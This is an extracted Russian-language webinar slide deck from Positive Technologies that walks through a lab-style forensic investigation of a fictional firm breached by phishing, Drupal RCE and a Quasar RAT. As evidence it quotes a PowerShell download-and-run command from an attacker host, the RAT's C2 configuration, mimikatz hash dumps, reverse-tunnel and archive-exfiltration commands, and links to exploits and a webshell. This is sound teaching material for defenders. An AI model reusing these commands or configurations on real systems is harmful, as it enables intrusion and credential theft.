Embed Size (px)
Citation preview
ptsecurity.com
Расследование инцидентов:экспертиза и анализ
Денис Гойденко, Александр Григорян
Эксперты Positive Technologies Expert Security Center
PT Expert
Security Center
Threat
Intelligence
50+отслеживаемых групп
Incident
Response
50+расследований в год
Network
Security
5000+сетевых сигнатур
Экспертиза в продукты
План вебинараЧто такое форензика
Обобщение процесса
ТЕОРИЯ Когда применять
Где искать
О конкурсе
С чего начинать анализ
Артефакты
ПРАКТИКА Утилиты
Анализ неформализуемых данных
Реверс
Нормализация данных
ИТОГИ Выявление ключевых событий
Определение индикаторов
ТЕОРИЯ
Что такое форензика
Forensics =судебная наука
FORENSIC Science = наука об исследовании доказательств
+
computer = COMPUTER FORENSICS
СБОР ЭКСПЕРТИЗА АНАЛИЗ ОТЧЕТ
Источник Данные Информация Доказательства
nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-86.pdfGuide to Integrating Forensic Techniques into Incident Response:
В виде схемы
Raw-артефактыАртефакты
после парсинга
Артефакты после
фильтрации и нормализации
Индикатор компрометации
Когда применять
• Для реагирования на инциденты ИБ,
• Расследования инцидентов ИБ,
• Выявления причин технических инцидентов,
• Мониторинга,
• Восстановления данных,
• Сбора данных,
• Соответствия требованиям регуляторов
Где искать
ОПЕРАТИВНАЯ ПАМЯТЬ ПОСТОЯННАЯ ПАМЯТЬ СЕТЕВОЙ ТРАФИК
OS Windows OS *nix Mac OS iOS Android Specialized
A A A A A A A A A A A A A
OPERATING SYSTEMS
APPLICATIONS
Постоянная память
• SPI Flash
• HDD
• USB Flash/HDD
• Flash cards (MMC/SD/xD etc.)
• CD/DVD
• Backup tape
10110101101001
010111010101100
101100110111101
01010110101011
………………….
file1.exe
file2.evtx
file3.pf
file4.dll
file1.fil
fragmented.file
…………
User Activity
Program Execution
Lateral Movement
Exploitation
…………
Оперативная память
10110101101001
010111010101100
101100110111101
01010110101011
………………….
Page Tables
Page Directories
……………
_FILE_OBJECT
_EPROCESS
_OBJECT_SYMBOLIC_LINK
_TOKEN
_ETHREAD
……………
Сетевой трафик
10110101101001
010111010101100
101100110111101
01010110101011
………………….
Packet
Packet
Packet
Packet
Packet
……………
Sublayer field data
Sublayer field data
Sublayer field data
Sublayer field data
……………
Как собирать
Люди
Администраторы
систем
Пользователи Менеджеры
Технические средства
Online/Offline Virtual Images RAM Dump
Информация о средствах защиты
информацииЛогическая карта сети
Физическая карта сети
Информация о пользователях
Информация о технической реализации процессов
Информация о ключевых событиях
в организации
Информацияо политиках
безопасностиИнформация
о бизнес-процессах
Как собирать:
технические средства
• Raw access to
locked files
• Native
tools(cmd/PS/bash)
• FastIR
• Onsite parsing/Only
collect
• Mozilla MIG
• GRR
• Velociraptor
• *.vmem
• *.vmsn/*.vmss
• Vbox:
vboxmanage, --
dbg, vboxdump.py
• QEMU – virsh
• Xen/KVM – libvmi
• Hyper-V – vm2dmp
• Not system drive
• F-Response
• Memoryze
• FTK Imager
• EnCase
• Belkasoft RAM Capturer
• Winpmem
• Hardware (1394)
• Физические
блокираторы записи
• Блокираторы записи
на уровне ОС
• Набор переходников
• Live Media
• Набор отверток
• Адаптер для HDD
• Шнур SATA
• TAP
• EWF
Online Offline Virtual machines RAM Dump
Про конкурс
Про конкурс
Bot server
File server
Compromised
hosts
Contestant
Data
Brief
Evidences
web.archive.org/web/20190408082359/http://muchmoney.ga/Сайт Much Money:
Про Much Money
Про Much Money
ПРАКТИКА
Экспертиза: входные данные
My boss said someone sent letters to our office in Bangladesh with invoices to
pay for someone else’s bill. And the guys from bangladesh sent the money.
Also, the data from our knowledge base and the history of all transactions on
operations are missing. Something strange is also happening with the site, the
administrator cannot enter the administration panel. I need help with forensics.
I took images from hosts and servers. I can give you listings of files from these
images, for which I will give you files that you request. I just need to know the
MD5 file hash and I’ll give you a download link.
• Можешь ли подробнее рассказать об инциденте?
• Чем я тебе могу помочь?
Письма База знанийИстория
транзакцийСайт
• Что случилось-то?
Экспертиза: письма
Экспертиза: письма
+ LECmd = открывала, но не получилось:
Fileslist:
1
23
5
6
www.reconstructer.org/OfficeMalScanner:
ericzimmerman.github.io/LECmd:
Экспертиза: static analyze
olevba.py
7z.exe
oledir.py
www.decalage.info/python/oletoolsOletools:
Экспертиза: static analyze1
2
3
4
5
Unpacked result.docx: app.xml:
Экспертиза: static analyze
deBase64
1
Свойство <Company>
deBase64
2
3
4
5 Empire identification
Экспертиза: sandbox1
2
github.com/ptresearch/AttackDetection/blob/master/PowerShell%20Empire/power_shell_empire.rulesSuricata PT Open Ruleset:
Экспертиза: EmpireФункциональность(закрепление):
NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion
NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion\Run
deBase64:
1
2
3
Экспертиза
…а у администратора - получилось
Разница между листингом и $MFT
открывала, но не получилось:
ЭкспертизаСмотрим листинг папки temp Вширь
Вглубь
Iработа с индикаторами:
• список хэшей
• список имен
рабочая папка хакера – temp, расширяем поиск:
lateral movement
wce.exe
logging
psexec.exe
ADMIN PC
Экспертиза
Рабочая папка хакера TEMP, изучаем содержимое:
ALL PC
HoboCopy —
TeamViewer —
WCE —
• Фишинг
• Макросы(VBS)
• Архивирование(7z, Rar)
• Удаленное управление cli(Empire, psexec)
• Удаленное управление GUI(TV, AmmyyAdmin, rdp)
• Дамп учетных записей(WCE)
• Скриптинг(PS, cmd)
• Копирование залоченных файлов
+ DC, BOSS hosts
Wce:EmpireProject:
github.com/xymnal/wcegithub.com/EmpireProject/Empirewww.teamviewer.com/github.com/candera/hobocopy
www.ammyy.com/
TeqmViewer:HoboCopy:AmmyyAdmin:
ЭкспертизаРабочая папка хакера TEMP на ВСЕХ узлах (самый ранний wce):
DC PC
wce.bat wce
ЭкспертизаРабочая папка хакера TEMP:
DC PC
launcher1.bat BOSS PC
BOSS PC SYSTEM registry hive:
Proxy to 34.238.235.73:80
Some TV, Ammyy, reg-work(secr), static password on TV
ЭкспертизаИщем все местоположения известных IOCs -> новая папка:
BOSS PC
Видим результат использования WebHistoryPass:
1
2
ЭкспертизаBOSS PC
PECmd.exe – prefetch timeline
Просмотр документов
Запуск WebHistoryPass
Какие документы открывались?
PECmd: https://ericzimmerman.github.io/
ЭкспертизаBOSS PC
JLECmd.exe
OSFMount
Пусто
Свободное пространство:
R.saver
JLECmd: ericzimmerman.github.io/
ЭкспертизаBOSS PC
Тот же CnC
USB attack vector:
ЭкспертизаBOSS PC
Письма:
Сбор писем:
Bangladesh: Fake:
Initial Access Execution Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection ExfiltrationCommand and
ControlImpact
Spearphishing Attachment
Command-Line Interface
Accessibility Features
Accessibility Features
Obfuscated Files or Information
Account Manipulation
Browser Bookmark Discovery
Remote Desktop Protocol
Data from Local System
Data Compressed Commonly Used PortStored Data
Manipulation
Phishing Through Removable Storage
Graphical User Interface
Registry Run Keys / Startup Folder
Bypass User Account Control
Credential DumpingFile and Directory
DiscoveryRemote File Copy
Data from Network Shared Drive
Data Encrypted Connection Proxy
PowerShell Credentials in FilesNetwork Service
ScanningRemote Services Email Collection
Exfiltration Over Alternative Protocol
Data Encoding
ScriptingNetwork Share
DiscoveryThird-party Software
Exfiltration Over Command and
Control ChannelRemote Access Tools
Third-party Software Network SniffingWindows Admin
SharesRemote File Copy
Trusted Developer Utilities
Query RegistryWindows Remote
ManagementStandard Application
Layer Protocol
Windows Management
Instrumentation
Standard Cryptographic
Protocol
Windows Remote Management
MatrixATT&CK
attack.mitre.org/ATT&CK Matrix for Enterprise:
CASE 2
Экспертиза: входные данные
My boss said someone sent letters to our office in Bangladesh with invoices to
pay for someone else’s bill. And the guys from bangladesh sent the money.
Also, the data from our knowledge base and the history of all transactions on
operations are missing. Something strange is also happening with the site, the
administrator cannot enter the administration panel. I need help with forensics.
I took images from hosts and servers. I can give you listings of files from these
images, for which I will give you files that you request. I just need to know the
MD5 file hash and I’ll give you a download link.
• Можешь ли подробнее рассказать об инциденте?
• Чем я тебе могу помочь?
Письма База знанийИстория
транзакцийСайт
• Что случилось-то?
On the server WIN2003 there used to be a system for processing trade transactions, on which the transaction history was kept. They represent a folder with documents in recent years. The entire transaction archive is missing. We need them for further research.
This is old transaction server. We lost all transactions from it.
khalil-shreateh.com/khalil.shtml/it-highlights/8966-Microsoft-Windows-EternalBlue-SMB-Remote-Code-Execution--.html
14809,5,True,5,5,.,pwned.txt,.txt,0,1,,False,F
alse,False,False,False,False,Archive,DosWin
dows,28.03.2019 08:51:33,,28.03.2019
14:14:03,28.03.2019 08:51:33,28.03.2019
14:14:03,28.03.2019 08:51:33,28.03.2019
14:14:03,28.03.2019
08:51:33,0,387888150,466,,,
github.com/EricZimmerman/MFT
www.sans.org/security-resources/posters/windows-forensic-analysis/170/downloadWindows Forensic Analysis:
MFT parser:
Exploit EternalBlue:
Path LastModifiedTimeUTCC:\Documents and Settings\Administrator\Application Data\services\sd.exe 15.04.2019 13:24
C:\Documents and Settings\Administrator\Application Data\services\r.exe 15.04.2019 13:18
C:\Documents and Settings\Administrator\Application Data\services\7.exe 15.04.2019 12:28
C:\Documents and Settings\Administrator\Application Data\services\update.exe 15.04.2019 12:18
C:\Documents and Settings\Administrator\Application Data\services\ms.exe 29.03.2019 5:43
C:\Documents and Settings\Administrator\Application Data\services\gs.exe 29.03.2019 5:22
C:\Documents and Settings\Administrator\Application Data\services\kiwi start.bat 29.03.2019 5:03
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat 28.03.2019 20:14
C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\m.exe 28.03.2019 13:25
ericzimmerman.github.io/
Compatibility CacheApplication
AppCompatCacheParser:
Microsoft wireless secrets:
No interfaces found
MUCHMONEY\tsokihata::8c528bc80d45f1e2b0d3662b97ebed58:5363dec787f9df3c135e551c92a0ec1d:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
WIN2003\Administrator::c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
Administrator(current):500:c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:9344f0479b9974e2add04e93904fd248:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0(current):1001:aad3b435b51404eeaad3b435b51404ee:1e5697ec0b1a1b89fc429fa23327d8f4:::
mimikatz # lsadump::sam
Domain : WIN2003
SysKey : 362bc4a7806ee94ebfee8cb009c35ab5
Local SID : S-1-5-21-3089925616-1146513134-864702280
SAMKey : 8dbeb822499a12e3f6b99845677bcd11
RID : 000001f4 (500)
User : Administrator
Hash LM : c33eb318664f594a8d989d02e7f332d1
Hash NTLM: f3c6489a9ab82faf5ff959c97d7a4d40
RID : 000001f5 (501)
User : Guest
RID : 000003e9 (1001)
User : SUPPORT_388945a0
Hash NTLM: 1e5697ec0b1a1b89fc429fa23327d8f4
RID : 000003eb (1003)
User : ASPNET
Hash NTLM: 9344f0479b9974e2add04e93904fd248
lm - 0: 32dc9a9cc3912c522c2a1857bd9eefce
ntlm- 0: 9344f0479b9974e2add04e93904fd248
www.virustotal.com/gui/file/4ceb14edd4a681997c99255b3b4895c0012a735e5f4ac0323e9c97f102ad5725/detection
app.any.run/tasks/d49fb8b5-3da4-4f65-9706-b5a5e40968ceInteractive Online Malware Analysis Sandbox:
VirusTotal:www.winitor.com/get.htmlMalware Initial Assessment:
Quasar is a fast and light-weight remote
administration tool coded in C#. The usage
ranges from user support through day-to-day
administrative work to employee monitoring.
Providing high stability and an easy-to-use
user interface, Quasar is the perfect remote
administration solution for you.
github.com/quasar/QuasarRAT
RATQuasar
unit42.paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/
www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
www.us-cert.gov/ncas/analysis-reports/AR18-352A
Compressed (QuickLZ) & Encrypted (TLS) Task Manager File Manager Remote Desktop Remote Shell Download & Execute Upload & Execute System Information Keylogger (Unicode Support) Reverse Proxy (SOCKS5) Registry Editor
Operation Cloud Hopper:
Analysis Report (AR18-352A):
APT10 – Quasar RAT analysis: www.immersivelabs.com/2019/01/29/apt10-quasar-rat-analysis/
Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments:
Remote Administration Tool for Windows:
AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa");
string a =
AES.Decrypt("AatyrR7530jcEddqQ+/COFF8FXAxIWDi3E7SZf5
FbWOk6kqERYpeylucj5ccrULb9ZFIw20J9vcTIbYe3BZwUbi2TE
12nCa9aDyWX3E8Pj8=");
Console.WriteLine(a);
string Version = "1.3.0.0";
string Hosts = "muchm0ney.tk:80;";
int RECONNECTDELAY = 300;
string KEY = "GLfNNklGizWZMlHMlK+j9Q==";
string AUTHKEY = "z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrDhJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==";
Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData;
string DIRECTORY = Environment.GetFolderPath(SPECIALFOLDER);
string SUBDIRECTORY = "services";
string INSTALLNAME = "spoolsvc.exe";
bool HideSubDirectory = true;
bool HideFile = true;
string Mutex = "QSR_MUTEX_muchm0ney";
string RegistryName = "Windows Printer Spool Service";
bool HIDEFILE = true;
bool ENABLELOGGER = true;
string ENCRYPTIONKEY = "RoMfNZtSSIpcpGyRmEXa";
string TAG = "muchm0ney";
string LOGDIRECTORYNAME = "Logs";
bool HIDELOGDIRECTORY= true;
bool HIDEINSTALLSUBDIRECTORY = true;
AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa",
"z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrD
hJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==");
string l = AES.ReadLogFile(“.\\Logs\\03-29-2019");
04-16-201904-16-2019
<p class="h">
<br>
<br>[<b>Connect to dc0.muchmoney.ga - 11:36</b>]</p>
<br>muchmoney.ga\tsokihata
<p class="h">[Tab]</p>Kur0$@w@
<p class="h">[Enter]</p>
<br>
<p class="h">
alert tcp $EXTERNAL_NET :1024 -> $HOME_NET
any (msg:"Non-Std TCP Server Traffic contains '|40
00 00 00|' (Quasar RAT Initial Packet)"; sid:10000;
rev:1; flow:established,from_server; dsize:68;
content:"|40 00 00 00|"; depth:4; fast_pattern;)
Forensics
Network
PwIntercept
media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
docs.microsoft.com/en-us/windows/win32/secmgmt/installing-and-registering-a-password-filter-dll
citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.1032.2458&rep=rep1&type=pdf
Password Filter DLL:
Windows credential theft: Methods and mitigations:
THE PROJECTSAURON APT:
{
"Source": "Security",
"EventID": 601,
"EventType": 8,
"Computer": "WIN2003",
"NumStrings": 8,
"SID": "S-1-5-18",
"TimeGenerated": 2019-03-28T06:17:29+00:00,
"Strings": [
"KUqy",
"powershell -command (new-object System.Net.WebClient).DownloadFile(\\'http://muchm0ney.tk/spoolsvc.exe\\',
\\'C:\\wmpub\\mwiislog\\spoolsvc.exe\\'",
"16",
"2",
"LocalSystem",
"ANONYMOUS LOGON",
"NT AUTHORITY",
"(0x0,0x41D63)"
],
"RecordNumber": "4476",
"TimeWritten": 1553753849
}
https://metacpan.org/pod/Parse::EventLog
Attempt to install service
EVT Log
Parse::EventLog:
18.222.249.59 3389 29.03.2019 8:04
https://github.com/zer0-t/RDP-screenshotter/blob/master/RDP-screenshotter.shRDP-screenshotter:
Анализ: update.exestrings:
golang
IDA:
Need main
Анализ: update.exe
d
GoUtils: gitlab.com/zaytsevgu/GoUtils2.0/
GoUtils
main_main
Анализ: update.exe
d
some bytes
XOR
github.com/volatilityfoundation/volatility
Forensics
Memory
An advanced memory forensics framework::
67
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services\share" -pY23QyJCj%kak
\WINDOWS\system32\cmd.exe - r.exe "C:\Documents and
Settings\Administrator\Application Data\services\share.rar" -hp23QyJCj%kAK
\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services" -pY23QyJCj%kAK
Adminisystem32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services\share.rar" -pY23QyJCj%kak
C:\WINDOWS\system32\cmd.exe - r.exe a "C:\Documents and
Settings\Administrator\Application Data\services\share" "C:\Documents and
Settings\Administrator\Application Data\services" -pY23QyJCj%kAKkAAK*5
40 00 ? 06 ? ? 0A 00 ? ? 0A 00 B9 68 ? ? 01 bd
www.iana.org/assignments/protocol-numbers/protocol-numbers.xml
TCP Flags Don’t fragment
Skip TTL
Skip header checksum
Src address: 10.0.*.*
Any Source Port
SMB Port: 445
Dst address: 10.0.185.104
tools.ietf.org/html/rfc791#section-3.1
Proto: TCP - 6
RFC 791 - Internet Protocol:
Assigned Internet Protocol Numbers:
gchq.github.io/CyberChef/#recipe=From_Hex('Auto')To_Decimal('Space',false)&input=NDAgMDAgNDAgMDYgNzAgMjcgMEEgMDAgQjkgNjkgMEEgMDAgQjkgNjgg
QTYgMDQgMDEgQkQCyberChef Recipe:
./auth.log.2.gz:Mar 27 23:04:37 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ;
PWD=/var/www/html/ssf/ssf-linux-x86_64-3.0.0 ; USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445
54.165.150.118 -p 80
./auth.log.2.gz:Apr 10 14:21:52 lamp sudo: www-data : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/html ;
USER=root ; COMMAND=./ssf -g -R 127.0.0.1:445:10.0.185.104:445 54.165.150.118 -p 80
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] connecting to <54.165.150.118:80>
./apache2/error.log.9.gz:[2019-03-27T23:05:43+03:00] [info] [ssf] running (Ctrl + C to stop)
-rwxrwx--- 1 root vboxsf 353 мар 27 2019 ./var/www/html/ssf/ssf-linux-
x86_64-3.0.0/config.json
-rwxrwx--- 1 root vboxsf 80K мар 27 2019
./var/www/html/sites/default/modules/connect.php
-rwxrwx--- 1 root vboxsf 353 мар 27 2019 ./var/www/html/config.json
-rwxrwx--- 1 root vboxsf 80K мар 27 2019 ./var/www/html/connect.php
securesocketfunneling.github.io/ssf/#homeSecure Socket Funneling:
github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.phpWebShell wso-4.2.5:
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:00:23 +0300] "GET /connect.php HTTP/1.1" 200 6588
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101
Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:37 +0300] "POST /connect.php HTTP/1.1" 200 5842
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101
Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:04:38 +0300] "GET /connect.php HTTP/1.1" 200 6588
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
./access.log.9.gz:77.243.191.35 - - [27/Mar/2019:23:05:43 +0300] "POST /connect.php HTTP/1.1" 200 5838
"http://muchmoney.ga/connect.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0"
Count Date
77 28/Mar/2019
50 10/Apr/2019
42 26/Mar/2019
35 27/Mar/2019
Count IP
96 18.222.249.59
64 77.243.191.35
43 31.44.93.2
1 103.244.3.7
https://github.com/ptresearch/AttackDetection/blob/master/CVE-2019-6340/cve-2019-6340.rules
https://www.ambionics.io/blog/drupal8-rce
CVE-2019-6340
Exploit Drupal8's REST RCE
https://www.exploit-db.com/exploits/46459REST Module Remote Code Execution:
EXPLOITING DRUPAL8'S REST RCE:Open PT ESC ruleset:
7878
https://bitly.com/2UbQmhT+
03/27/2019-21:32:06.083219 [**] [1:10003494:2] TOOLS [PTsecurity] PHP Object
Deserialization RCE POP Chain (Guzzle/RCE1) [**] [Classification: Attempted
Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 ->
192.70.197.230:80
03/27/2019-21:32:06.083219 [**] [1:10004555:3] ATTACK [PTsecurity] Arbitrary
PHP RCE in Drupal 8 < 8.5.11,8.6.10 (CVE-2019-6340) [**] [Classification:
Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 54.165.150.118:52540 -
> 192.70.197.230:80
Bitly | URL Shortener:
Initial Access Execution Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection Exfiltration Command and Control Impact
Exploit Public-Facing Application
Command-Line Interface
Registry Run Keys / Startup Folder
Web Shell Clear Command History Credential Dumping Account Discovery Pass the Hash Clipboard DataData
CompressedCommonly Used Port Data Destruction
PowerShell Web ShellDeobfuscate/Decode Files or
InformationPassword Filter DLL
File and Directory Discovery
Remote Desktop Protocol
Input Capture Connection Proxy Disk Content Wipe
Regsvr32 File Deletion Network Share Discovery Remote File Copy Screen Capture Data EncodingStored Data
Manipulation
Scripting File Permissions Modification Network Sniffing Windows Admin Shares Video Capture Data Obfuscation
Service Execution Hidden Files and Directories Password Policy Discovery Multilayer Encryption
MasqueradingPermission Groups
DiscoveryRemote Access Tools
Network Share Connection Removal
Process Discovery Remote File Copy
Obfuscated Files or Information Query RegistryStandard Application Layer
Protocol
DLL Side-LoadingSystem Information
DiscoveryStandard Cryptographic
Protocol
ScriptingSystem Network
Configuration Discovery
TimestompSystem Network
Connections Discovery
MatrixATT&CK
https://attack.mitre.org/ATT&CK Matrix for Enterprise:
Анализ: timeline
Анализ: результаты
• Исследование вширь и вглубь,
• Проведение как динамического, так и статического анализа,
• Хранение трафика,
• Расшифровка трафика,
• Проведение логических взаимосвязей между данными,
• Выявление прочих векторов атак,
• Нахождение исходного вектора,
• Корреляция найденных артефактов,
• Заполнение временнЫх пробелов,
• Понимание логики действий
Вопросы
ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/PT ESC Threat Intelligence blog
PT ESC Incident Response Alertptsecurity.com/ru-ru/services/esc/
Вопросы
ptsecurity.com/upload/corporate/ww-en/analytics/calypso-apt-2019-eng.pdf
ptsecurity.com/upload/corporate/ww-en/analytics/Operation-Taskmasters-2019-eng.pdf
Полезные ссылки
Calypso АРТ: изучаем новую группировку, атакующую госучреждения
Operation TaskMasters: Кибершпионаж в эпоху цифровой экономики
ptsecurity.com
Спасибо
за внимание!
